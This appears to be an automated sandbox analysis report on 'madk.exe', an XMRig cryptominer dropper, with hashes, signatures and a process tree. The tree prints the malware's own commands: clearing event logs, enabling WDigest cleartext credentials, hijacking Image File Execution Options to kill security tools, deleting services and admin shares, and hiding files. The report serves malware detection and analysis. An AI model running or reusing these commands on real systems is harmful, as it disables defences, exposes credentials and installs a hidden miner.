Analysis
-
max time kernel
151s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
21-06-2022 21:54
Static task
static1
Behavioral task
behavioral1
Sample
madk.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
madk.exe
Resource
win10v2004-20220414-en
General
-
Target
madk.exe
-
Size
3.4MB
-
MD5
d00af5991807952929e5b986afd295c9
-
SHA1
7f5cc8203f2e22bea24bf7f7b2995dc2ef3571ee
-
SHA256
025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594
-
SHA512
c032eec4bbb1a34113ea86606ae3b1c5d94a7f6f7d52d3347341312d4bf3af2dfa730d549b612a37353a21274eae8f10960ad105fc52c4955c33cccf5f0c1cd6
Malware Config
Signatures
-
Clears Windows event logs 1 TTPs 3 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exepid process 2664 wevtutil.exe 2640 wevtutil.exe 2616 wevtutil.exe -
Detected Stratum cryptominer command 2 IoCs
Looks to be attempting to contact Stratum mining pool.
Processes:
svchost.exerundlls.exepid process 2132 svchost.exe 2432 rundlls.exe -
XMRig Miner Payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/1796-131-0x0000000000400000-0x0000000000DEF000-memory.dmp xmrig C:\Windows\Fonts\rundlls.exe xmrig \Windows\Fonts\rundlls.exe xmrig behavioral1/memory/1796-167-0x0000000000400000-0x0000000000DEF000-memory.dmp xmrig -
Executes dropped EXE 13 IoCs
Processes:
svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.execonhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exerundlls.exepid process 268 svchost.exe 328 svchost.exe 1392 svchost.exe 2044 svchost.exe 392 svchost.exe 1640 svchost.exe 1796 conhost.exe 2132 svchost.exe 2152 svchost.exe 2180 svchost.exe 2204 svchost.exe 2348 svchost.exe 2432 rundlls.exe -
Sets file execution options in registry 2 TTPs 20 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger = "C:\\\\WINDOWS\\\\system32\\\\svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\debugger = "taskkill.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe\deebugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe\debugger = "taskkill.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe\debugger = "taskkill.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe\deebugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe reg.exe -
Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 2272 attrib.exe 1608 attrib.exe 2108 attrib.exe 1108 attrib.exe 384 attrib.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx behavioral1/memory/1516-94-0x0000000000400000-0x0000000000809000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx behavioral1/memory/268-97-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/328-98-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/1392-99-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/2044-100-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/2044-105-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/268-104-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/392-106-0x0000000140000000-0x0000000140053000-memory.dmp upx \??\c:\windows\Fonts\conhost.exe upx C:\Windows\Fonts\conhost.exe upx behavioral1/memory/1516-128-0x0000000000400000-0x0000000000809000-memory.dmp upx behavioral1/memory/1796-131-0x0000000000400000-0x0000000000DEF000-memory.dmp upx behavioral1/memory/1640-132-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx \??\c:\windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx behavioral1/memory/2180-152-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/2152-151-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/2132-153-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/1392-154-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/2348-158-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/2204-155-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/2204-163-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/1796-167-0x0000000000400000-0x0000000000DEF000-memory.dmp upx behavioral1/memory/1640-168-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral1/memory/2348-169-0x0000000140000000-0x0000000140053000-memory.dmp upx -
Deletes itself 1 IoCs
Processes:
WScript.exepid process 840 WScript.exe -
Loads dropped DLL 6 IoCs
Processes:
madk.exesvchost.exepid process 1516 madk.exe 2172 2196 2240 2300 2348 svchost.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exepid process 2392 takeown.exe 1756 takeown.exe 2084 takeown.exe 2364 takeown.exe -
Drops file in Windows directory 64 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.execonhost.exeattrib.exeattrib.exeattrib.exemadk.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\svchost.exe attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification \??\c:\windows\Fonts\svchost.exe conhost.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\Fonts\conhost.exe madk.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\lsass.exe attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification \??\c:\windows\Fonts\WinRing0x64.sys madk.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\Fonts\WinRing0x64.sys madk.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification \??\c:\windows\Fonts\rundlls.exe conhost.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\Fonts\svchost.exe madk.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts\sqlservr.exe attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts\csrss.exe attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\Fonts\rundlls.exe conhost.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe -
Launches sc.exe 23 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2248 sc.exe 2324 sc.exe 864 sc.exe 1960 sc.exe 1460 sc.exe 688 sc.exe 904 sc.exe 2688 sc.exe 2276 sc.exe 2440 sc.exe 832 sc.exe 560 sc.exe 632 sc.exe 1168 sc.exe 1436 sc.exe 2676 sc.exe 2224 sc.exe 2144 sc.exe 580 sc.exe 1652 sc.exe 2176 sc.exe 2168 sc.exe 2500 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with WMI 4 IoCs
Processes:
WMIC.exeWMIC.exeWMIC.exeWMIC.exepid process 892 WMIC.exe 2304 WMIC.exe 2240 WMIC.exe 1172 WMIC.exe -
Kills process with taskkill 14 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1588 taskkill.exe 1260 taskkill.exe 832 taskkill.exe 1544 taskkill.exe 520 taskkill.exe 940 taskkill.exe 1960 taskkill.exe 972 taskkill.exe 328 taskkill.exe 1204 taskkill.exe 2440 taskkill.exe 1556 taskkill.exe 1352 taskkill.exe 1412 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
conhost.exepid process 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe 1796 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 460 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exerundlls.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 832 taskkill.exe Token: SeDebugPrivilege 972 taskkill.exe Token: SeDebugPrivilege 1544 taskkill.exe Token: SeDebugPrivilege 940 taskkill.exe Token: SeDebugPrivilege 1556 taskkill.exe Token: SeDebugPrivilege 1352 taskkill.exe Token: SeDebugPrivilege 520 taskkill.exe Token: SeDebugPrivilege 1960 taskkill.exe Token: SeDebugPrivilege 1412 taskkill.exe Token: SeLockMemoryPrivilege 2432 rundlls.exe Token: SeIncreaseQuotaPrivilege 2304 WMIC.exe Token: SeSecurityPrivilege 2304 WMIC.exe Token: SeTakeOwnershipPrivilege 2304 WMIC.exe Token: SeLoadDriverPrivilege 2304 WMIC.exe Token: SeSystemProfilePrivilege 2304 WMIC.exe Token: SeSystemtimePrivilege 2304 WMIC.exe Token: SeProfSingleProcessPrivilege 2304 WMIC.exe Token: SeIncBasePriorityPrivilege 2304 WMIC.exe Token: SeCreatePagefilePrivilege 2304 WMIC.exe Token: SeBackupPrivilege 2304 WMIC.exe Token: SeRestorePrivilege 2304 WMIC.exe Token: SeShutdownPrivilege 2304 WMIC.exe Token: SeDebugPrivilege 2304 WMIC.exe Token: SeSystemEnvironmentPrivilege 2304 WMIC.exe Token: SeRemoteShutdownPrivilege 2304 WMIC.exe Token: SeUndockPrivilege 2304 WMIC.exe Token: SeManageVolumePrivilege 2304 WMIC.exe Token: 33 2304 WMIC.exe Token: 34 2304 WMIC.exe Token: 35 2304 WMIC.exe Token: SeIncreaseQuotaPrivilege 2304 WMIC.exe Token: SeSecurityPrivilege 2304 WMIC.exe Token: SeTakeOwnershipPrivilege 2304 WMIC.exe Token: SeLoadDriverPrivilege 2304 WMIC.exe Token: SeSystemProfilePrivilege 2304 WMIC.exe Token: SeSystemtimePrivilege 2304 WMIC.exe Token: SeProfSingleProcessPrivilege 2304 WMIC.exe Token: SeIncBasePriorityPrivilege 2304 WMIC.exe Token: SeCreatePagefilePrivilege 2304 WMIC.exe Token: SeBackupPrivilege 2304 WMIC.exe Token: SeRestorePrivilege 2304 WMIC.exe Token: SeShutdownPrivilege 2304 WMIC.exe Token: SeDebugPrivilege 2304 WMIC.exe Token: SeSystemEnvironmentPrivilege 2304 WMIC.exe Token: SeRemoteShutdownPrivilege 2304 WMIC.exe Token: SeUndockPrivilege 2304 WMIC.exe Token: SeManageVolumePrivilege 2304 WMIC.exe Token: 33 2304 WMIC.exe Token: 34 2304 WMIC.exe Token: 35 2304 WMIC.exe Token: SeIncreaseQuotaPrivilege 2240 WMIC.exe Token: SeSecurityPrivilege 2240 WMIC.exe Token: SeTakeOwnershipPrivilege 2240 WMIC.exe Token: SeLoadDriverPrivilege 2240 WMIC.exe Token: SeSystemProfilePrivilege 2240 WMIC.exe Token: SeSystemtimePrivilege 2240 WMIC.exe Token: SeProfSingleProcessPrivilege 2240 WMIC.exe Token: SeIncBasePriorityPrivilege 2240 WMIC.exe Token: SeCreatePagefilePrivilege 2240 WMIC.exe Token: SeBackupPrivilege 2240 WMIC.exe Token: SeRestorePrivilege 2240 WMIC.exe Token: SeShutdownPrivilege 2240 WMIC.exe Token: SeDebugPrivilege 2240 WMIC.exe Token: SeSystemEnvironmentPrivilege 2240 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
rundlls.exepid process 2432 rundlls.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
madk.execonhost.exepid process 1516 madk.exe 1516 madk.exe 1796 conhost.exe 1796 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
madk.execmd.exedescription pid process target process PID 1516 wrote to memory of 1784 1516 madk.exe cmd.exe PID 1516 wrote to memory of 1784 1516 madk.exe cmd.exe PID 1516 wrote to memory of 1784 1516 madk.exe cmd.exe PID 1516 wrote to memory of 1784 1516 madk.exe cmd.exe PID 1516 wrote to memory of 896 1516 madk.exe reg.exe PID 1516 wrote to memory of 896 1516 madk.exe reg.exe PID 1516 wrote to memory of 896 1516 madk.exe reg.exe PID 1516 wrote to memory of 896 1516 madk.exe reg.exe PID 1516 wrote to memory of 624 1516 madk.exe reg.exe PID 1516 wrote to memory of 624 1516 madk.exe reg.exe PID 1516 wrote to memory of 624 1516 madk.exe reg.exe PID 1516 wrote to memory of 624 1516 madk.exe reg.exe PID 1516 wrote to memory of 1804 1516 madk.exe reg.exe PID 1516 wrote to memory of 1804 1516 madk.exe reg.exe PID 1516 wrote to memory of 1804 1516 madk.exe reg.exe PID 1516 wrote to memory of 1804 1516 madk.exe reg.exe PID 1516 wrote to memory of 1216 1516 madk.exe reg.exe PID 1516 wrote to memory of 1216 1516 madk.exe reg.exe PID 1516 wrote to memory of 1216 1516 madk.exe reg.exe PID 1516 wrote to memory of 1216 1516 madk.exe reg.exe PID 1784 wrote to memory of 2032 1784 cmd.exe attrib.exe PID 1784 wrote to memory of 2032 1784 cmd.exe attrib.exe PID 1784 wrote to memory of 2032 1784 cmd.exe attrib.exe PID 1784 wrote to memory of 2032 1784 cmd.exe attrib.exe PID 1516 wrote to memory of 2028 1516 madk.exe reg.exe PID 1516 wrote to memory of 2028 1516 madk.exe reg.exe PID 1516 wrote to memory of 2028 1516 madk.exe reg.exe PID 1516 wrote to memory of 2028 1516 madk.exe reg.exe PID 1516 wrote to memory of 1960 1516 madk.exe sc.exe PID 1516 wrote to memory of 1960 1516 madk.exe sc.exe PID 1516 wrote to memory of 1960 1516 madk.exe sc.exe PID 1516 wrote to memory of 1960 1516 madk.exe sc.exe PID 1516 wrote to memory of 560 1516 madk.exe sc.exe PID 1516 wrote to memory of 560 1516 madk.exe sc.exe PID 1516 wrote to memory of 560 1516 madk.exe sc.exe PID 1516 wrote to memory of 560 1516 madk.exe sc.exe PID 1516 wrote to memory of 580 1516 madk.exe sc.exe PID 1516 wrote to memory of 580 1516 madk.exe sc.exe PID 1516 wrote to memory of 580 1516 madk.exe sc.exe PID 1516 wrote to memory of 580 1516 madk.exe sc.exe PID 1516 wrote to memory of 1460 1516 madk.exe sc.exe PID 1516 wrote to memory of 1460 1516 madk.exe sc.exe PID 1516 wrote to memory of 1460 1516 madk.exe sc.exe PID 1516 wrote to memory of 1460 1516 madk.exe sc.exe PID 1516 wrote to memory of 1652 1516 madk.exe sc.exe PID 1516 wrote to memory of 1652 1516 madk.exe sc.exe PID 1516 wrote to memory of 1652 1516 madk.exe sc.exe PID 1516 wrote to memory of 1652 1516 madk.exe sc.exe PID 1516 wrote to memory of 632 1516 madk.exe sc.exe PID 1516 wrote to memory of 632 1516 madk.exe sc.exe PID 1516 wrote to memory of 632 1516 madk.exe sc.exe PID 1516 wrote to memory of 632 1516 madk.exe sc.exe PID 1516 wrote to memory of 1168 1516 madk.exe sc.exe PID 1516 wrote to memory of 1168 1516 madk.exe sc.exe PID 1516 wrote to memory of 1168 1516 madk.exe sc.exe PID 1516 wrote to memory of 1168 1516 madk.exe sc.exe PID 1516 wrote to memory of 1436 1516 madk.exe sc.exe PID 1516 wrote to memory of 1436 1516 madk.exe sc.exe PID 1516 wrote to memory of 1436 1516 madk.exe sc.exe PID 1516 wrote to memory of 1436 1516 madk.exe sc.exe PID 1516 wrote to memory of 832 1516 madk.exe taskkill.exe PID 1516 wrote to memory of 832 1516 madk.exe taskkill.exe PID 1516 wrote to memory of 832 1516 madk.exe taskkill.exe PID 1516 wrote to memory of 832 1516 madk.exe taskkill.exe -
Views/modifies file attributes 1 TTPs 64 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 2496 attrib.exe 1240 attrib.exe 2088 attrib.exe 1508 attrib.exe 2908 attrib.exe 1736 attrib.exe 2356 attrib.exe 2712 attrib.exe 2776 attrib.exe 3056 attrib.exe 2856 attrib.exe 1200 attrib.exe 2680 attrib.exe 2660 attrib.exe 2860 attrib.exe 2084 attrib.exe 2772 attrib.exe 1592 attrib.exe 2284 attrib.exe 2096 attrib.exe 2980 attrib.exe 1708 attrib.exe 2108 attrib.exe 1084 attrib.exe 1280 attrib.exe 1260 attrib.exe 2596 attrib.exe 832 attrib.exe 2092 attrib.exe 2368 attrib.exe 2396 attrib.exe 1324 attrib.exe 696 attrib.exe 864 attrib.exe 2544 attrib.exe 2164 attrib.exe 2396 attrib.exe 1968 attrib.exe 1488 attrib.exe 1512 attrib.exe 1804 attrib.exe 556 attrib.exe 1316 attrib.exe 696 attrib.exe 1240 attrib.exe 2676 attrib.exe 2944 attrib.exe 1892 attrib.exe 1836 attrib.exe 3012 attrib.exe 2788 attrib.exe 2316 attrib.exe 2356 attrib.exe 2336 attrib.exe 2732 attrib.exe 2100 attrib.exe 1692 attrib.exe 1124 attrib.exe 1400 attrib.exe 1236 attrib.exe 1964 attrib.exe 1956 attrib.exe 1160 attrib.exe 2220 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\madk.exe"C:\Users\Admin\AppData\Local\Temp\madk.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts3⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f2⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f2⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f2⤵
-
C:\Windows\SysWOW64\sc.exesc stop MetPipAtcivator2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MetPipAtcivator2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop SetPipAtcivator2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete SetPipAtcivator2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotMaims2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotMaims2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotMais2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotMais2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im dl1hots.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im d1lhots.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im rundlls.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net.exenet user mm123$ /del2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del3⤵
-
C:\Windows\SysWOW64\net1.exenet1 user mm123$ /del2⤵
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.02⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.03⤵
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.02⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.12⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.13⤵
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.12⤵
- Launches sc.exe
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start MetPipAtcivator2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\TEMP\csonhost.bat2⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f3⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.1 -n 53⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\sc.exesc start MetPipAtcivator3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc start MetPipAtcivator3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet share iPC$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share iPC$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share admin$ /delete3⤵
-
